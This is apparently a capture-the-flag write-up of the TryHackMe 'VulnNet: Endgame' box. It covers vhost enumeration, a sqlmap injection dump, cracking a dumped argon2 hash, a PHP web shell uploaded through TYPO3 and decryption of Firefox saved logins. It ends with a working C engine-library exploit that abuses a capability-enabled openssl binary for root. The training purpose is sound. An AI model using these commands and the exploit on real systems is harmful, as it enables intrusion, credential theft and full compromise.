CTF : VulnNet: Endgame

CTF VulnNet: Endgame writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 30 September 2022

Information

  • IP: 10.10.73.164
  • MYIP: 10.8.16.133

First enumeration

Basics

  • NMAP
```console
$ sudo nmap -p- 10.10.73.164
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-29 22:46 CEST
Nmap scan report for 10.10.73.164
Host is up (0.038s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 47.65 seconds
```

Vulnerabilities search

I added vulnnet.thm to my /etc/hosts because the IP address led to an HTML page saying that all services were handled by the vulnnet.thm domain.

http://vulnnet.thm shows a countdown website...

First I used dirsearch to see if I could find something interesting.

I found a .DS_Store ...

```console
$ dirsearch -u http://vulnnet.thm/js/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/boula/.dirsearch/reports/vulnnet.thm/-js-_22-09-29_22-55-59.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-09-29_22-55-59.log

Target: http://vulnnet.thm/js/

[22:55:59] Starting:
[22:56:00] 200 -    6KB - /js/.DS_Store
```

But there were only js files.

So I decided to search for possible vhosts:

```console
$ gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://vulnnet.thm
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/09/29 23:11:55 Starting gobuster in VHOST enumeration mode
===============================================================
Found: blog.vulnnet.thm (Status: 200) [Size: 19316]
Found: shop.vulnnet.thm (Status: 200) [Size: 26701]
Found: api.vulnnet.thm (Status: 200) [Size: 18]
Found: admin1.vulnnet.thm (Status: 307) [Size: 0]
```

OK, let's add them to /etc/hosts :)

On the blog host we can find this call:

http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1

Exploit

Using sqlmap I found that this endpoint is vulnerable to SQL injection.

So I also used sqlmap to dump the databases:

```shell
sqlmap -u "http://api.vulnnet.thm/vn_internals/api/v2/fetch/?blog=1" --level=5 --risk=3 --dump-all
```

I downloaded two databases, blog and vn_admin.

The vn_admin content is base64 encoded. After decoding it manually I finally found this record:

```
1||0|1655226789|0|0|0|0|0|chris_w@vulnnet.thm|0||1655226810||0|$argon2i$v=19$m=65536,t=16,p=2$UnlVSEgyMUFnYnJXNXlXdg$j6z3IshmjsN+CwhciRECV2NArQwipqQMIBtYufyM4Rg|0||0|1655226789|a:14:{s:14:"interfaceSetup";s:7:"backend";s:10:"moduleData";a:1:{s:32:"web_dashboard/current_dashboard/";s:40:"e5f1f8ea7b30afe7e4024c15b606a6fcb501a631";}s:19:"thumbnailsByDefault";i:1;s:14:"emailMeAtLogin";i:0;s:11:"startModule";s:13:"web_dashboard";s:8:"titleLen";i:50;s:8:"edit_RTE";s:1:"1";s:20:"edit_docModuleUpload";s:1:"1";s:15:"resizeTextareas";i:1;s:25:"resizeTextareas_MaxHeight";i:500;s:24:"resizeTextareas_Flexible";i:0;s:4:"lang";s:0:"";s:19:"firstLoginTimeStamp";i:1655226810;s:15:"moduleSessionID";a:1:{s:32:"web_dashboard/current_dashboard/";s:32:"773e00fbb960a0ba87ad8c39f3c4a691";}}|1||chris_w|0|1
```

I got a user and a hash:

```
chris_w:$argon2i$v=19$m=65536,t=16,p=2$UnlVSEgyMUFnYnJXNXlXdg$j6z3IshmjsN+CwhciRECV2NArQwipqQMIBtYufyM4Rg
```
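To read what that dump actually handed over, here is an added Python example (not from the writeup) that pulls the argon2 PHC string out of the pipe-separated row, which I assume is a TYPO3 be_users record, and decodes its variant, cost parameters, salt and digest; the row is trimmed to a few fields and the function names are mine.

```python
import base64
import re

# Constructed sample: the be_users-style row from the dump, trimmed to a few fields
# (the argon2 string is the one shown in the writeup; the serialized uc blob is dropped).
DUMPED_ROW = (
    "1||0|1655226789|0|0|0|0|0|chris_w@vulnnet.thm|0||1655226810||0|"
    "$argon2i$v=19$m=65536,t=16,p=2$UnlVSEgyMUFnYnJXNXlXdg$"
    "j6z3IshmjsN+CwhciRECV2NArQwipqQMIBtYufyM4Rg|0||0|1655226789|1||chris_w|0|1"
)

# PHC string layout: $<variant>$v=<version>$<params>$<salt>$<hash> (base64 without '=' padding)
PHC_RE = re.compile(
    r"^\$(?P<variant>argon2(?:id|i|d))\$v=(?P<version>\d+)\$(?P<params>[^$]+)"
    r"\$(?P<salt>[^$]+)\$(?P<hash>[^$]+)$"
)

def b64decode_unpadded(s: str) -> bytes:
    # PHC strips the '=' padding; put it back so the standard decoder accepts it
    return base64.b64decode(s + "=" * (-len(s) % 4))

def find_argon2_hashes(row: str) -> list:
    """Pick the argon2 PHC field(s) out of a pipe-separated dump row."""
    return [f for f in row.split("|") if f.startswith("$argon2")]

def parse_argon2_phc(phc: str) -> dict:
    """Break an argon2 PHC string into variant, version, cost parameters, salt and digest."""
    m = PHC_RE.match(phc)
    if not m:
        raise ValueError("not an argon2 PHC string: " + phc)
    params = {k: int(v) for k, v in (kv.split("=") for kv in m["params"].split(","))}
    return {
        "variant": m["variant"],
        "version": int(m["version"]),
        "memory_kib": params["m"],      # m=65536 KiB -> 64 MiB per hash computation
        "iterations": params["t"],
        "parallelism": params["p"],
        "salt": b64decode_unpadded(m["salt"]),
        "hash": b64decode_unpadded(m["hash"]),
    }

if __name__ == "__main__":
    for phc in find_argon2_hashes(DUMPED_ROW):
        info = parse_argon2_phc(phc)
        print(f"{info['variant']} v{info['version']}: {info['memory_kib'] // 1024} MiB, "
              f"t={info['iterations']}, p={info['parallelism']}, "
              f"salt {len(info['salt'])} B, digest {len(info['hash'])} B")
```

The parameters say each guess costs 64 MiB and 16 passes, so the KDF was not the weak point here; password reuse between the blog and vn_admin databases was.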

The users table from the blog database contains a lot of users and passwords, so I extracted the passwords to use them as a wordlist with john.

```shell
cat users.csv | cut -d "," -f 3 > ~/CTF/VulnNet_Endgame/userlist.txt
```

Then I used john to crack chris_w's password:

```shell
john ./hash.txt --wordlist=./passlist.txt
```

And it worked:

```console
xxxxxxxxxxx (chris_w)
```

From there, I logged into TYPO3 as chris_w, went to the admin section and allowed PHP file uploads.

I uploaded a shell file and used the interface to display it.

And then I got a shell :)

I had to own the user called system. I found a logins.json in a Firefox profile... it seems we can retrieve information from there.

I made an archive of the .mozilla directory and downloaded it.

Then I used a Python tool to retrieve the information:

```shell
git clone https://github.com/unode/firefox_decrypt.git
```

```console
$ python3 firefox_decrypt.py ../tmp/.mozilla/firefox/
Select the Mozilla profile you wish to decrypt
1 -> 2fjnrwth.default-release
2 -> 2o9vd4oi.default
3 -> 8mk7ix79.default-release
1

Website:   https://tryhackme.com
Username: 'chris_w@vulnnet.thm'
Password: 'xxxxxxxxxxxxxxxxxx'
```

I used SSH to connect and get a more stable shell. ;)

Privilege escalation

Enumeration for privesc

Running this:

```shell
getcap -r / 2>/dev/null
```

led me to this:

```console
/home/system/Utils/openssl =ep
```
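As an added defender-side example (not part of the writeup), this Python script parses `getcap -r` output in both the older `path = caps+flags` style and the newer `path caps=flags` style and flags entries like the one above, where an empty capability list with `=ep` means the full set; apart from the openssl line, the sample output and the function names are constructed.

```python
import re

# Constructed sample of `getcap -r / 2>/dev/null`; only the openssl line is from the box.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/lib/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/home/system/Utils/openssl =ep
/opt/tools/backup cap_dac_read_search,cap_setuid=p
"""

# Capabilities that on their own let a local user become root or read/modify anything.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override", "cap_dac_read_search",
             "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner", "cap_setfcap"}

def parse_getcap_line(line: str):
    """Return (path, {cap: set(flags)}) for one getcap line; '*' stands for the full set."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                        # old libcap: "path = caps+flags"
        path, captext = line.split(" = ", 1)
    else:                                    # new libcap: "path caps=flags"
        path, _, captext = line.rpartition(" ")
    granted = {}
    for clause in captext.split():
        m = re.match(r"^([a-z0-9_,]*)([=+-])([eip]*)$", clause)
        if not m or m.group(2) == "-" or not m.group(3):   # clearing flags grants nothing
            continue
        names, _, flags = m.groups()
        for name in (names.split(",") if names else ["*"]):  # empty list == all capabilities
            granted.setdefault(name, set()).update(flags)
    return path, granted

def audit_getcap(output: str) -> list:
    """List (path, reason) for entries that deserve a closer look first."""
    findings = []
    for line in output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, granted = parsed
        if granted.get("*", set()) & {"e", "p"}:
            findings.append((path, "full capability set (=ep)"))
            continue
        risky = sorted(c for c, f in granted.items() if c in HIGH_RISK and f & {"e", "p"})
        if risky:
            findings.append((path, "high-risk capabilities: " + ",".join(risky)))
    return findings
```

A binary under a user's home directory carrying the full set is the kind of entry this should surface first; setcap grants outside the package-managed paths are worth reviewing on every host.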

I found a blog post that explains what to do with this:

https://chaudhary1337.github.io/p/how-to-openssl-cap_setuid-ep-privesc-exploit/

Exploit

Basically I needed to compile, on my box, a library based on this code:

```c
#include <openssl/engine.h>
#include <stdlib.h>
#include <unistd.h>

// Engine bind callback, invoked by openssl when the .so is loaded with -engine.
// The binary carries the full capability set (=ep), so setuid/setgid to 0 succeed.
static int bind(ENGINE *e, const char *id) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 1;   // tell openssl the engine bound successfully
}

IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```

```shell
gcc -fPIC -o exploit.o -c exploit.c
gcc -shared -o exploit.so -lcrypto exploit.o
scp exploit.so system@10.10.73.164:/tmp/
```

Then, on the target box:

```shell
/home/system/Utils/openssl req -engine /tmp/exploit.so
```

```console
# whoami
root
# cat /root/thm-flag/root.txt
```

\o/